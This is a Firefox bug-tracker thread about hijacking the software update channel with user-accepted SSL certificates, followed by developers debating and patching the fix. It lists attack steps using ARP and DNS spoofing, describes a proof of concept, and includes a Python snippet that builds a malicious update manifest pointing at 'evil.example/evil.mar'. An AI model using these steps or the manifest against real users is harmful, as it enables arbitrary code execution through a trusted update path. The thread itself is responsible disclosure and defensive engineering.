User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:22.214.171.124) Gecko/20060426 Firefox/126.96.36.199
Build Identifier: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:188.8.131.52) Gecko/20060426 Firefox/184.108.40.206
The software update system in Firefox is assumed to be secure: an invalid certificate or a non-matching CN causes the SSL connection to the update server to be reset, and Firefox displays an error.
However, there is an oversight that exposes a security problem: the browser trusts its own certificate cache. Therefore, if an attacker can get his certificate accepted by a victim, the attacker gains free rein to hijack the software update session and potentially execute arbitrary code on the victim's host.
- Victim goes to their favorite SSL-enabled website
- Attacker spoofs DNS to redirect them to their lookalike site
- Victim accepts attacker's certificate (either permanently OR temporarily) because they don't know any better or simply don't care if someone's snooping on them
- Firefox software update is triggered, either manually through "Help->Check For Updates" or automatically the next time Firefox is started.
- Attacker spoofs DNS for aus2.mozilla.org and SSL connection is successful due to the victim's earlier acceptance of the attacker's cert.
- Firefox follows the evil XML file and Take-Over-The-World v1.0 code is downloaded to victim's host.
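The steps above can be modeled with a toy trust check (illustrative only, not Firefox's actual code — all the names and data here are made up): a cert accepted on a lookalike site later "validates" the spoofed update connection, because the override store remembers only the certificate, not what site it was accepted for.

```python
# Toy model of the flawed trust decision: a manual acceptance
# short-circuits the issuer check for ALL later connections.
TRUSTED_ROOTS = {"Builtin CA"}
overrides = set()  # fingerprints of certs the user manually accepted

def accept_cert(fingerprint):
    """User clicks through the bad-cert dialog."""
    overrides.add(fingerprint)

def ssl_ok(hostname, cert):
    """cert is a dict with 'cn', 'issuer', 'fp' keys."""
    if cert["fp"] in overrides:
        return cert["cn"] == hostname  # issuer check is skipped entirely
    return cert["issuer"] in TRUSTED_ROOTS and cert["cn"] == hostname

evil = {"cn": "aus2.mozilla.org", "issuer": "Self-Signed", "fp": "evil-fp"}
assert not ssl_ok("aus2.mozilla.org", evil)  # rejected: untrusted issuer
accept_cert("evil-fp")                       # victim accepts on lookalike site
assert ssl_ok("aus2.mozilla.org", evil)      # spoofed update host now passes
```

Because the attacker controls the CN, the CN check offers no protection once the user has accepted the cert anywhere.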
Usually, in the worst case, accepting an invalid SSL certificate only results in MITM snooping, but in this case the flaw in Firefox exposes the victim to local code execution. A potential solution would be to not rely on the certificates that a user has accepted when making the SSL connection to the update server.
Once a user has accepted a cert I don't know that the client can get the information to know whether it's a user-accepted cert or built in. PSM probably can, maybe it could expose something.
Aren't such certs accepted for a particular site? If so the attacker's look-alike-site (to something else) has to be using aus2.mozilla.org as its hostname for this to work.
I believe we're moving toward eliminating the dialogs and making invalid certs simply fail -- no option to accept them. That would stop this attack.
Storing a copy of the "one true cert" in the client and comparing against that (or its hash or fingerprint) would also work, at least until the cert expired. It would make it that much more difficult for corporate sites to customize the update URL to an internal site.
> Aren't such certs accepted for a particular site?
The cert for the lookalike site would simply have to set the CN to aus2.mozilla.org. Firefox displays a warning when the CN of a cert doesn't match the hostname of the site.
> Would make it that much more difficult for corporate sites to customize the
> update URL to an internal site.
Perhaps a good solution would be to store a hash of the update server's cert in something like "app.update.cert_hash". By default, it would be the hash of aus2.mozilla.org's cert but could be easily modified by corporate users using a custom update server.
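A minimal sketch of that pinning idea, assuming a pref named "app.update.cert_hash" holding a SHA-256 fingerprint (both the pref semantics and the hash choice are assumptions here; the DER bytes are placeholders):

```python
import hashlib

# Hypothetical pinning check: compare the update server cert's
# fingerprint against the pinned pref value before trusting anything.
def cert_fingerprint(der_bytes):
    return hashlib.sha256(der_bytes).hexdigest()

def update_cert_ok(der_bytes, prefs):
    pinned = prefs.get("app.update.cert_hash")
    return pinned is not None and cert_fingerprint(der_bytes) == pinned

der = b"...aus2.mozilla.org certificate in DER form..."
prefs = {"app.update.cert_hash": cert_fingerprint(der)}
assert update_cert_ok(der, prefs)
assert not update_cert_ok(b"attacker cert", prefs)
```

A corporate deployment pointing updates at an internal server would just ship a different hash in the pref.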
but the certificate will expire at some point. Update would stop functioning then if the client expected a specific cert...
(In reply to comment #4)
> but the certificate will expire at some point. Update would stop functioning
> then if the client expected a specific cert...
Ah, true. Has anyone entertained the idea of signing the updates themselves?
We did consider signing the updates (and there were lengthy discussions on the matter), but we opted for the current solution because it seemed simpler.
Created attachment 224375 [details]
proof of concept
I whipped up this proof of concept just to show how easily this vulnerability can be exploited in a live network environment.
It operates as follows:
* Starts up SSL webserver with a self-signed certificate
(CN = aus2.mozilla.org)
* Turns on IPv4 forwarding and runs arpspoof to poison the arp cache
of hosts on the local network
* Runs dnsspoof to redirect requests to RANDOM_SSL_SITE and
aus2.mozilla.org to our webserver
* Waits patiently...
* Modify simple vars at top of firefox-poc.py...I'm lazy ;-)
* Start up PoC (python firefox-poc.py)
* Start up Firefox (note: Firefox must have write privileges to the
  directory containing its binary in order for the update system to
  be enabled, may require root)
* Visit https://RANDOM_SSL_SITE and accept the bad cert
* Go to "Help->Check For Updates" and update and restart Firefox
* Since our evil cert was accepted when the user visited
  RANDOM_SSL_SITE, the connection to aus2.mozilla.org can be
  hijacked and our malicious payload evil.mar is delivered
* evil.mar is harmless and simply places a Hello World bash script
in Firefox's directory as proof of concept
* Python - http://www.python.org/
* TLS Lite - http://trevp.net/tlslite/
Provides SSL for python webserver
* dsniff - http://www.monkey.org/~dugsong/dsniff/
Provides arpspoof and dnsspoof
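For reference, the manifest the PoC serves might look roughly like this. It is a sketch: the element and attribute names only loosely follow the real AUS2 update.xml format, and the URL, hash, and size values are made up.

```python
import xml.etree.ElementTree as ET

# Build a malicious update manifest: the client follows the patch URL
# and verifies the download only against the attacker-supplied hash.
def evil_manifest(mar_url, mar_hash, mar_size):
    return (
        '<?xml version="1.0"?>'
        '<updates><update type="minor" version="9.9">'
        f'<patch type="complete" URL="{mar_url}" '
        f'hashFunction="SHA1" hashValue="{mar_hash}" size="{mar_size}"/>'
        '</update></updates>'
    )

manifest = evil_manifest("https://evil.example/evil.mar", "deadbeef", 1234)
patch = ET.fromstring(manifest).find("update/patch")
assert patch.get("URL") == "https://evil.example/evil.mar"
```

The hash in the manifest protects only the integrity of the plaintext MAR download; it is attacker-chosen here, so it offers no defense once the SSL fetch of the manifest itself is hijacked.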
how about having the update code verify that the cert was signed by a known CA? this wouldn't have the issue of making customized update sites harder.
I guess the attacker could get the user to install his CA certificate, but I suppose there's no real defense against that...
Ping! Over a month and no progress on an easily exploitable bug...
We've not forgotten this (note the "blocking firefox 2" approval flag that was just granted).
The cert system was unfortunately not designed with naive users in mind. Really, about the only thing to do is not present the dialog at all on a questionable cert. Can't validate? Can't connect!
This will, of course, piss off lots of developer-types who run sites with self-signed certs, who also tend to be our biggest fans... kind of a dilemma. IE7 might be going that route, if so we could get away with it.
We could have a pref to control whether or not the dialogs are shown, and we could default that pref to false. That's pretty suboptimal but it would allow developer-types to get around the restriction. If we do this, we'd need to be sure to give the user sufficient feedback as to why the load could not proceed.
(In reply to comment #10)
> This will, of course, **** off lots of developer-types who run sites with
> self-signed certs, who also tend to be our biggest fans... kind of a dilemma.
> IE7 might be going that route, if so we could get away with it.
I can't imagine any browser would do such a thing...that's pretty ridiculous.
The issue here is not the cert system, it's that the update system trusts the cert system when it connects to the update server. Accepting an invalid certificate and putting yourself at risk for MITM SSL snooping is nothing new, but the issue here is the local code execution that results.
Is there any reason why Christian's suggestion in comment #8 would be infeasible?
christian's solution sounds promising to me.
Mozilla's policy is that the *USER* is in complete control of his set of
trusted CA certificates, and the USER is responsible for it, not mozilla.
It's not our decision to make for the user, it's the user's decision to
make for himself. We provide a default list for the user to use as a
starting point, but the user is in complete control after that.
MoFo/MoCo avoid a certain degree of liability that they might otherwise
incur if they did exert complete control over it.
This bug report proposes another policy, one in which mozilla, not the
user, decides what is (and is not) an trustworthy CA certificate (and
indirectly, what is and isn't a trustworthy SSL server cert), at least
for updates. Such a policy change should be made only after full
consideration of all its implications.
It doesn't look to me like that's what this is about. This is about the user explicitly accepting a semi-invalid certificate for https://www.phisher.com/ and then the update service being phished at https://update.mozilla.org/
Accepting the "bad" certificate for phisher.com shouldn't have any effect on certificate resolution for update.mozilla.org (or any other site, for that matter).
I *think* the scenario being described here is equivalent to this shorter and simpler one:
1. create an https server whose real DNS name is https://phisher.com
2. Give it a self-issued cert that claims to be for https://aus2.mozilla.org
3. Get the victim to visit https://phisher.com.
4. Get the victim to override the error about cert being from unknown issuer
5. Get the victim to override the error about cert/host name mismatch
6. poison victim's DNS cache (just alter /etc/hosts) so that aus2.mozilla.org
   points to the IP address for phisher.com
7. Victim fetches update from https://phisher.com, but really is fetching
from https server at phisher.com. No host name mismatch error, because
names match. No error about invalid cert issuer, because USER has already
explicitly chosen to trust the cert supplied by phisher.com.
The user made a security decision at step 4 to trust the cert at FACE VALUE
despite it being from an unknown issuer. That means that we will trust the
cert in all respects AS IF IT HAD COME FROM A TRUSTED ISSUER, including
trusting that the host names on its face were correct. That was the user's
decision, his choice. We can take that choice away from him. Do you propose that?
The user made an additional decision (step 5) to ADDITIONALLY trust the cert
for a name that is NOT ON ITS FACE, namely phisher.com. We add that name to
the list of trusted names for that cert, just as if that name had been in
the cert itself.
Now, apparently, you want to have the result of steps 4 and 5 be that we
do NOT trust the cert for the values on its face, but do trust it for the
names we added to it. Do I have that right?
This is almost certainly a duplicate of one of several other older bugs,
most of which were resolved invalid. I just want to be sure I understand
what precisely you're proposing so I know which bug (if any) is the dup.
The point is that when the user chooses to override a cert security dialog,
he is choosing to treat a cert as if it was completely valid on its face,
as if it was issued by a properly trusted CA. That's what it does.
That's the decision the user makes. I think you're asking for behavior
that is inconsistent with that user decision.
Above my step 7 was intended to read:
7. Victim fetches update from https://aus2.mozilla.org, but really is fetching
from https server at phisher.com. (rest is the same)
I think this bug is essentially a duplicate of bug 308244 which is unresolved.
In reviewing that bug, and this one again, several things are clear to me:
a) people have a mental model of how cert validation works that doesn't
match up with how it really works, so when they discover that it doesn't
work as they had imagined, they perceive it to be a vulnerability.
b) people aren't generally aware that when they override an error that says
"this cert isn't provably from a trusted source", they're saying "oh, yes
it is; treat it as such."
c) people apparently expect that when they experience and override a cert
name mismatch, that thereafter the newly trusted cert is NOT trusted for
any of the host names on its face, and is (only) trusted for the
hostname they were seeking at the time they chose to perform the override.
Actually, in retrospect, I think maybe it's not a bad idea to change the
behavior to work as suggested in "c" above. We could change the behavior
of cert name matching so that, when the cert has a non-empty set of additional
host names that have been attached to it via name mismatch overrides, then
we ONLY check for matches between the current URL hostname and the names in
the set of additional hostnames, and NOT for any of the names that exist in
the cert itself.
One consequence of that proposal would be that if the user went to the site
named in a cert, after he had used that same cert with some other host and
had performed a name override, he'd have to perform ANOTHER override to get
the cert to work with the name that is already in the cert! I can just
IMAGINE trying to explain THAT to users. ("But the name is already in the
cert!")
There's also a potential for a DoS attack if we do that. The admin of site
https://phisher.com puts a copy of the real cert from aus2.mozilla.org on
his server, and gets people to visit his site as https://phisher.com.
The victims override the cert name mismatch, thereby rendering that cert
unusable for the real aus2.mozilla.org site, and thereby preventing any
subsequent successful accesses of the real https://aus2.mozilla.org (unless
the user does ANOTHER name mismatch override).
Personally, much as I know many people would find it inconvenient, I think
the only real solution to the vulnerabilities is to eliminate the users'
capability of overriding cert/host name mismatches. Our desire to allow
some people ("advanced (?) users") to do this in limited circumstances
creates an essentially inescapable vulnerability for basic users who
override cert errors willy-nilly, every chance they get. I think that as
long as we let people override security errors, they will hurt themselves
by so doing.
(In reply to comment #15)
> Accepting the "bad" certificate for phisher.com shouldn't have any effect on
> certificate resolution for update.mozilla.org (or any other site, for that
> matter).
Nelson: Your scenario described in comment #7 is mostly correct, although you can spoof DNS on a local network to achieve steps 3 and 6 much more easily. This is exactly what the proof of concept does.
I believe you may be confused about the scope of this bug though. Most users have accepted invalid certificates at some point, usually out of ignorance of the consequences. I have accepted invalid certificates many times for various reasons, and I am a network security engineer and am aware of the consequences. But here's the thing, and this is a synopsis of the entire bug:
Accepting an invalid certificate for an arbitrary site should only expose a user to SSL MITM attacks. It should NEVER allow local code execution, as the update system facilitates in this case. The division between host and network security is breached; therefore, the update system has a bug.
An attacker could use a library/coffee shop/university/corporate/any available network and within minutes be executing arbitrary code on victim hosts via the Firefox update system. If you believe that does not qualify as a bug, feel free to mark it as invalid, but I would expect a fair backlash from the security community when this is publicly disclosed.
Nelson, you miss the point of this bug, the original problem is nothing like bug 308244 or any change to cert handling in the normal case (apart from my suggestion in comment 10, echoed in the last paragraph of your comment 18, that we simply reject mismatched certs which sidesteps the whole update issue, and comment 15 which restates bug 308244).
(In reply to comment #16)
> Now, apparently, you want to have the result of steps 4 and 5 be that we
> do NOT trust the cert for the values on its face, but do trust it for the
> names we added to it. Do I have that right?
No: the reporter wants us not to trust such a cert under any circumstances for any name __in the context of Firefox updates__. Updates are the only concern here. The reporter would be happy if the update code embedded the One True Cert and rejected connections under any other cert. Biesi's suggested compromise was to check that the CA for the connection was at least an installed one. There are probably few other options because NSS doesn't expose the fact that this is a temporarily user-accepted cert (afaik).
> The point is that when the user chooses to override a cert security dialog,
> he is choosing to treat a cert as if it was completely valid on its face,
> as if it was issued by a properly trusted CA. That's what it does.
> That's the decision the user makes. I think you're asking for behavior
> that is inconsistent with that user decision.
But the user, being naive, thinks they're saying "thanks for warning me this may be a dodgy site, but I'd like to connect anyway. I'll be careful." They have no concept that this temporary choice would have any bearing on the security of any non-browsing feature (or, for that matter, that it applies to browsing any other site--but that is bug 308244 as you point out). In particular they have no clue that we rely on the integrity of these certs to secure the update feature.
> Accepting an invalid certificate for an arbitrary site should only expose a
> user to SSL MITM attacks. It should NEVER allow local code execution, as
> the update system facilitates in this case.
Apparently the update system says "if the cert is good enough for SSL, it's
good enough for me too, and I will allow local code execution based on it."
That's a flawed design of the update system.
"Good enough for SSL" means the cert was directly trusted by the local user,
or was issued by someone who the local user trusts to be truthful. You
apparently don't want the trust decision for the update system to include
the local user's trust choices. Therefore, you don't want the update
system's trust to be determined by the algorithms that determine "good
enough for SSL".
There is already a separate trust system for code signing. When the user
chooses to trust a cert for SSL, that does NOT also trust the cert for code
signing. Maybe you want to be using code signing trust, rather than SSL
server trust, for the update system.
> Accepting the "bad" certificate for phisher.com shouldn't have any affect
> on certificate resolution for update.mozilla.org (or any other site, for
> that matter).
Accepting a "bad" certificate means choosing to believe that the cert's
contents (names, keys, etc.) are correct (a.k.a "valid", or "true") even
though we can't prove they came from a trusted issuer. This is also called
"trusting" the cert. It means the local user chooses to believe it as it is,
chooses to take it at face value for everything it says. If it says it's
for update.mozilla.org, then it WILL have an effect on future resolution of
certs for that site. The user tells us to do it, and we do it.
As long as you continue to trust the names in the cert itself, then allowing
the user to "accept" any cert (as we now do) will always make the user
vulnerable to spoofing on whatever DNS names appear in that accepted cert.
As I wrote in comment 18, one way to do what Ben wants is to do all the
following when a user "accepts" a cert:
a) add this cert to the list of user-trusted certs, and
b) mark it as NOT being trusted for any of the host DNS names that appear
in the cert itself, and
c) attach to the cert a list of DNS names for which the user has chosen to
trust the cert (the URI's host name when the user "accepted" the cert), and
d) thereafter trust the cert ONLY for the names in that attached list of
names and NOT for the names in the cert itself.
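The (a)-(d) scheme above could be modeled like this (a sketch with made-up data structures, not NSS code): an accepted cert is trusted ONLY for the hostnames attached at acceptance time, never for the names on its face.

```python
# Per-cert override store: fingerprint -> set of user-approved hostnames.
override_names = {}

def accept_for_host(fp, hostname):
    # steps (a) and (c): remember the cert and the hostname it was
    # accepted for at the time of the override
    override_names.setdefault(fp, set()).add(hostname)

def name_matches(fp, names_in_cert, hostname):
    if fp in override_names:
        # steps (b) and (d): consult only the attached list, and ignore
        # the names on the cert's face entirely
        return hostname in override_names[fp]
    return hostname in names_in_cert

accept_for_host("evil-fp", "phisher.com")
assert name_matches("evil-fp", {"aus2.mozilla.org"}, "phisher.com")
assert not name_matches("evil-fp", {"aus2.mozilla.org"}, "aus2.mozilla.org")
```

The second assertion also illustrates the DoS consequence described later: once overridden, the cert no longer works even for the name that really is in it.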
> Maybe you want to be using code signing trust, rather than SSL server trust,
(or in addition to it)
> for the update system.
Note: that doesn't necessarily mean using code signing (e.g. signed JAR files).
Having determined that the SSL server cert is "good enough for SSL", you could
then subject it to an additional test that it is also "good enough for code
signing".
(In reply to comment #22)
> Having determined that the SSL server cert is "good enough for SSL", you could
> then subject it to an additional test that it is also "good enough for code
> signing".
I'm not sure what you mean by this. Are you referring simply to checking that the root CA issuing the SSL cert has the code signing trust bit turned on as well, or are you referring to a specific check on the SSL cert itself? The former seems a weak test; there are a number of CAs with the code signing trust bit on.
NSS's CERT_VerifyCertificate API takes a pointer to a leaf cert (e.g. server
cert) and a "usage type" (e.g. SSL server usage, SSL client usage, email
signing usage, code signing usage, etc.). It then reconstructs the cert
chain for that cert (as much as it can) and walks the chain, validating
signatures and all the other stuff, until it comes to one of these conclusions:
a) this cert is verifiably good for the requested usage, because its chain
includes an issuer that is trusted to issue certs of this usage, and no
intermediate CA cert in the chain contains any qualifiers that prevent this
b) this cert is verifiably NOT good for the requested usage because one or
more of the issuer certs in the chain is qualified (with extensions) in ways that prevent it from issuing certs of the requested usage, or
c) this cert is not verifiably good or bad for this purpose, because no
cert in the chain is trusted to issue certs for this usage.
This is the function that is used to ask "is this cert good enough for SSL",
and it can also be asked to check if the cert is good enough for code signing.
I'm suggesting that in the update server case, the client can check the cert
for multiple usages, one of which is code signing. The server cert would then have to be both an SSL server cert and a code signing cert.
This is just an idea, and may not be the best conceivable one. It is generally recommended that code signing certs be used as "off line" certs, meaning that their private keys are not kept on machines that are on the net, especially not on servers. I'd really like it if we could use real code signing. But there seems to be a great reluctance on the part of MoFo or MoCo to do that, for reasons that have never been explained to me.
(In reply to comment #24)
> I'm suggesting that in the update server case, the client can check the cert
> for multiple usages, one of which is code signing. The server cert would then
> have to be both an SSL server cert and a code signing cert.
OK, I get it now. The end-entity certificate would have to be issued with both usage types, which is not something you could get in a plain vanilla SSL cert.
> I'd really like it if we could use real code signing. But there
> seems to be a great reluctance on the part of MoFo or MoCo to do that, for reasons that
> have never been explained to me.
I'd like to revisit that discussion; can you or someone else point me to the relevant mailing list or newsgroup threads? I did a quick search of the Google newsgroup archives and my copy of the internal mailing list and couldn't find exactly the thread(s) I remember.
It may be that the issues raised then are still issues, or maybe not. I will say that I don't think that money per se is or should be the issue. There are lots of ways we could deal with the money problem.
HTTPS was used because it was seen as a simple solution to the problem at hand. We fetch a manifest "securely," and that manifest contains a crypto hash of the archive that is downloaded over plaintext. Since there is near zero-cost for mozilla sysadmins to manage another SSL-site and the amount of build engineering required was lessened by not having to digitally sign the archives, this was seen as an attractive solution.
We were concerned about the cert problem, which is why we implemented code to always answer "no" to the bad cert dialog when loading the manifest. Unfortunately, it has this bug, and no one realized this flaw at the time.
I have learned that there is an extension for FF that detects the cert/host
name mismatch dialog and automatically bonks the OK button. It should be
called the "MITM vulnerability" extension.
In bug 228684, several people (including mscott, as I read it) propose that
that extension should be a feature of FF.
How do we reconcile the desire of one group (the participants in this bug)
who want security that the user cannot destroy with an override, with the
desire of the group that just wants no security dialogs, no matter
the security consequences?
(In reply to comment #27)
> How do we reconcile the desire of one group (the participants in this bug)
> who want security that the user cannot destroy with an override, with the
> desire of the group that just wants no security dialogs, no matter
> the security consequences?
Wrong. Nobody discussing this bug is talking about doing what you mention above except for you. Please reread comment #19 from me, comment #20 from Daniel, and comment #26 from Darin. I can't seem to stress enough that this bug is not about SSL certificate policy, so let's keep on-topic.
Nelson, I think NSS and PSM should provide an API to require that only valid certs be used for a particular SSL session. Is that possible?
Darin, Many of the oldest CA certs now in use in the world of PKI do not
meet the modern definition of "valid". NSS "grandfathers in" these old certs,
by providing a way to mark a cert as valid, even if it appears invalid.
These old certs are marked this way. They depend on these overrides.
Today, when a user marks a cert as valid, he is setting the same validity
override that NSS itself uses for those old CA certs. If you say "we want
the ability to ignore/disallow the validity override", then you disable both
bad server certs (which you want to do) and old CA certs (which I'll bet you don't).
> If you say "we want the ability to ignore/disallow the validity override",
> then you disable both bad server certs (which you want to do) and old CA
> certs (which I'll bet you don't).
Note Darin said "for a particular SSL session". That restriction would be just peachy, all we'd have to do is make sure the Update server has a cert issued by a valid CA.
That's not too high a hurdle for the handful of companies who might override the update URL with an internal IT-controlled server for corporate roll-outs. Is there any way to get a list of which CA's have grandfathered invalid certs?
Nelson, Yes I would be happy with such an API. As dveditz said, there are applications such as auto-update that do not care about grandfathered bad certs. So, what will it take for you guys to provide such an API?
Darin, we must flesh out the proposal a little more before we can estimate
the time required.
NSS offers two sets of functions today for cert chain validation. They differ
only in how the caller specifies the "usage" (e.g. SSL server cert, SSL client
cert, S/MIME encryption cert, S/MIME signature cert) for which he wants the
cert chain to be validated.
We might add a new usage to the list of known supported usages (e.g. SSL server ignoring valid/trusted peer overrides). Or we might add a new function.
Then presumably either an existing call to one of the CERT_VerifyCert* calls
would have to be changed, or a new call added. Personally, I'd think it
would be best to leave the SSL cert handling code in PSM alone, and add a new
call in the update processing code somewhere, to do an additional check on
the cert chain after it has passed the normal SSL cert chain verification.
But one could imagine something less clean, in which the PSM code that does
testing of SSL server certs (using NSS functions) would be changed to know
about special URLs.
Which of those do you have in mind, if either? (And what do you have in
mind, if none of the above?)
There's a very large project now underway (for over a year now) to produce an
entirely new cert chain validation implementation that fully implements all
of RFC 3280's algorithm, including dynamic cert fetching for incomplete server
cert chains. I need to consult with Julien Pierre, the leader of that project. We would want to design any new API in such a way that it doesn't set that project back significantly (after 24+ man months of work).
Nelson, I'd be happy with either the ability to tell PSM up-front that I don't want to use invalid certs or with the ability to test the cert later on for validity.
Mozilla has access to the nsNSSIOLayer object defined by PSM. If you can define an interface that that guy can implement, then we would be able to use it from the software update code to resolve this bug.
CCing other consumers of nsIBadCertListener, so they can be aware of this problem.
Nelson/Darin: what type of traction do we have here? Is it reasonable to expect something in the next 2-3 weeks?
(I hope this is obvious, but better safe... :-) The extension manager also has this same vulnerability, when checking for extension updates. One could use this technique to fake the availability of an update, and then serve up the fake update with arbitrary code.
More bug fodder: A quick check for "url" in about:config shows that some other browser features look vulnerable (at lesser degrees of severity) to this certificate handling quirk. For example, spoofing the Plugin Finder Service or "Get More Extensions" button could lead to users installing arbitrary code from a seemingly-trusted site. However, this admittedly gets into the fuzzy rathole between this bug, the issues in comment 18, and allowing users to ignore these warnings in the first place. [For example, we could make clicking on "Get More Extensions" spoof-proof via this bug, but how do you explain that clicking the same link in a web page (or even just typing it in) isn't always safe? Ugh!]
To me, it seems clear that we need to revamp our whole cert error override
scheme, and not just put a band-aid on update downloads for a particular
site or domain (e.g. mozilla.org).
There has been a LOT of discussion among the NSS/PSM team about this,
and some definite proposals are shaping up.
One interesting observation is that most of the bugs that complain about
necessity & frequency of cert overrides are THUNDERBIRD bugs, not FireFox
bugs. The most frequent complaints concern bad certs for servers, whose
host names are configured in preferences, not found in email or web page
links, and hence not subject to phishing attacks. (Phishers don't send
emails telling their victims to reconfigure their mail servers! :)
This leads to the possibility of taking two quite different approaches to
cert overrides, one for problems with mail/news/ldap server certs, and
another different approach for general web browser URLs. Stay tuned.
(BTW, is this a FireFox only bug? Doesn't TB also do updates?)
This applies to Thunderbird also, but the "Software Update" bugzilla component happens to currently live in the Firefox product rather than in the Toolkit product where it arguably belongs. I think there's a bug on moving it, at least it has been discussed.
Thunderbird users would seem to have less risk since they don't generally tend to come across self-signed SSL certs. Guess it could happen if you press the "show images" button on a malicious mail, or if you subscribe to a blog feed and choose to display the linked articles instead of just the summary in the feed.
Actually, it seems that numerous mail service providers tend to deploy invalid
SSL certs on their mail servers. In such cases, the users of those servers
encounter the same expired, unverifiable, and/or wrong host name certs, over
and over and over. Arguably, that is the case where having the ability to
remember a particular cert, or thumbnail of a particular cert, for the
specific server, is going to provide the highest benefit to the user (on the
grounds that the user visits the same mail servers over and over), with the
least risk from phishing. But this is the subject of bug 221552 and bug 228684.
OK, given that we'd like to have something workable for FF2, I'm considering the following solution:
Revise the update code to walk the issuer chain until we find the root issuer. Then check that the issuer has a tokenName of "Builtin Object Token" and a subjectName (or commonName?) that matches a value stored in prefs.
This is pretty easy to code, and I think it should be sufficient to protect Firefox and Thunderbird auto-update. It is not a great solution in general since some people might use a token other than the "Builtin Object Token", and mozilla.com might wish to change the cert issuer that they use in the future. Otherwise, it should do the trick.
Nelson, etc.: Please let me know what you think of this approach. Thanks!
Perhaps it is unnecessary to restrict the subject or common name of the issuer. Perhaps it is enough to just mandate an issuer from the "Builtin Object Token".
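The proposed chain walk could be sketched like this. Plain dicts stand in for the real PSM/NSS cert objects, and the pref name "app.update.cert.subject" is hypothetical (the comments above mention storing the expected value in prefs without naming the pref).

```python
# Walk the issuer chain to its root, then require that the root lives in
# the "Builtin Object Token" and that its subject matches the pref.
def root_issuer(cert):
    while cert.get("issuer") is not None:
        cert = cert["issuer"]
    return cert

def update_chain_ok(server_cert, prefs):
    root = root_issuer(server_cert)
    return (root.get("token_name") == "Builtin Object Token"
            and root.get("subject_name") == prefs["app.update.cert.subject"])

root = {"issuer": None, "token_name": "Builtin Object Token",
        "subject_name": "CN=Example Root CA"}
server = {"issuer": {"issuer": root}}  # server -> intermediate -> root
prefs = {"app.update.cert.subject": "CN=Example Root CA"}
assert update_chain_ok(server, prefs)

# A user-accepted self-signed cert roots in the software token, not the
# builtin token, so it fails the check.
self_signed = {"issuer": None, "token_name": "Software Security Device",
               "subject_name": "CN=aus2.mozilla.org"}
assert not update_chain_ok({"issuer": self_signed}, prefs)
```

This captures why the check defeats the attack: a manually accepted cert can never have a root in the read-only builtin token.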
Darin, you propose to add special case code for mozilla.org, to enforce
different rules for that domain than for any other domain. Your proposal
will do what you mean it to do, to make accesses to mozilla.org less
vulnerable to user cert overrides. Ensuring a known root should suffice.
By making this proposal, and certainly by implementing it, you're stating
that allowing users to override cert errors makes the PKI security system
too weak, at least for purposes that involve mozilla.org. You're stating
that cert overrides must not be allowed for mozilla.org.
If cert overrides make https too weak for mozilla.org, then IMO they also
make it too weak for (say) BankOfAmerica.com or WellsFargo.com. FF users
should be no less secure at their bank's web site than at a mozilla.org site.
Why would it be OK for the user to be more vulnerable at his bank than at mozilla.org?
If we're going to disallow overrides for mozilla.org then we should also
disallow overrides for bankofamerica.com and wellsfargo.com (and all others).
Please look at the proposal (and mockups) in bug 327181, and consider
that as an alternative to the proposal of comment 41 and comment 42 above.
When I wrote comment 38, I had recently attended a meeting with Red Hat
PSM and NSS folks, who were proposing a two-part solution: one solution
for the Firefox and SeaMonkey browsers (as proposed/shown in bug 327181),
and a second proposal for Thunderbird and SeaMonkey mail/news clients
(which AFAIK has not yet been set forth in any bugzilla RFE).
I thought that both of these proposals were going to be carried forward to
mozilla.org shortly after that meeting. Unfortunately, I've seen no further expression of interest in these proposals from the participants since that
meeting. So, if you urgently need to enact a short-term solution, no
alternatives to your proposals seem immediately available.
Thank you for taking the time to verify my proposed solution. Much appreciated!
> FF users should be no less secure at their bank's web site than at a
> mozilla.org site. Why would it be OK for the user to be more vulnerable at
> his bank than at mozilla.org?
I agree. I should point out that my proposal does not impact the behavior of FF when the user navigates to mozilla.org. Instead, it only impacts the software update system, which is invoked automatically w/o user interaction.
OK, I will proceed with the plan of creating a patch to implement issuer checking as proposed.
Moving target milestone from b2. We'd still like to get this in for the release, so it would be great to get this patched up and landed for the branch.
Created attachment 234362 [details] [diff] [review]
Comment on attachment 234362 [details] [diff] [review]
+ if (!channel.originalURI.schemeIs("https")) // bypass
hm... what if http redirected to https? guess then you don't have much security anyway...
but why not just nullcheck securityInfo?
+ // Perform some rudementary certificate verification:
(In reply to comment #47)
> (From update of attachment 234362 [details] [diff] [review] )
> + if (!channel.originalURI.schemeIs("https")) // bypass
> hm... what if http redirected to https? guess then you don't have much security
Right. If the original URL specified is not HTTPS, then there's no point in doing any further checks.
> but why not just nullcheck securityInfo?
Because the bad guy could have redirected from HTTPS to HTTP!
> + // Perform some rudementary certificate verification:
Yeah, "rudimentary" is the word I intended, but I actually don't like that comment being in there. It's not really accurate, and it doesn't add anything. I'll take it out.
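To spell out the ordering being discussed: the scheme check comes first, and a null securityInfo after that must be treated as failure rather than null-checked and skipped. Here's a sketch in plain JS with mock channel objects; the function name and mock shapes are illustrative, not the literal patch.

```javascript
// Sketch of the check order. If the original URL wasn't https, the
// caller never asked for security, so there's nothing to verify. If it
// *was* https, a null securityInfo means an attacker may have redirected
// https -> http, so letting property access throw (instead of
// null-checking and returning) aborts the update check.
function checkChannelCert(channel) {
  if (!channel.originalURI.schemeIs("https")) {
    return true; // bypass: plain-http update URL, no cert to check
  }
  // Throws TypeError if securityInfo is null (the downgrade case).
  const cert = channel.securityInfo.serverCert;
  return cert != null;
}

// Mock channels for illustration:
const httpsChannel = {
  originalURI: { schemeIs: s => s === "https" },
  securityInfo: { serverCert: { subjectName: "CN=aus2.mozilla.org" } },
};
const downgradedChannel = {
  originalURI: { schemeIs: s => s === "https" },
  securityInfo: null, // https request was redirected to http
};

console.log(checkChannelCert(httpsChannel)); // true
try {
  checkChannelCert(downgradedChannel);
} catch (e) {
  console.log("update check aborted"); // TypeError from null securityInfo
}
```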
Created attachment 234367 [details] [diff] [review]
Comment on attachment 234367 [details] [diff] [review]
so, if throwing upon accessing properties of a null securityInfo is an important part of the security check here, then there should probably be a comment to that effect :)
while I'm nitpicking, this log statement now no longer lists all the possible causes:
LOG("Checker", "There was a problem with the update service URL specified, " +
"either the XML file was malformed or it does not exist at the location " +
"specified. Exception: " + e);
> so, if the throwing upon accessing properties of a null securityInfo is an
> important part of the security check here, then there should probably be a
> comment to that effect :)
Yeah, I wanted to go into detail about this security check, but I'm not sure if I should give away so much detail about this flaw until long after people have been updated ;-)
> while I'm nitpicking, this log statement now no longer lists all the possible
> LOG("Checker", "There was a problem with the update service URL
> specified, " +
> "either the XML file was malformed or it does not exist at the
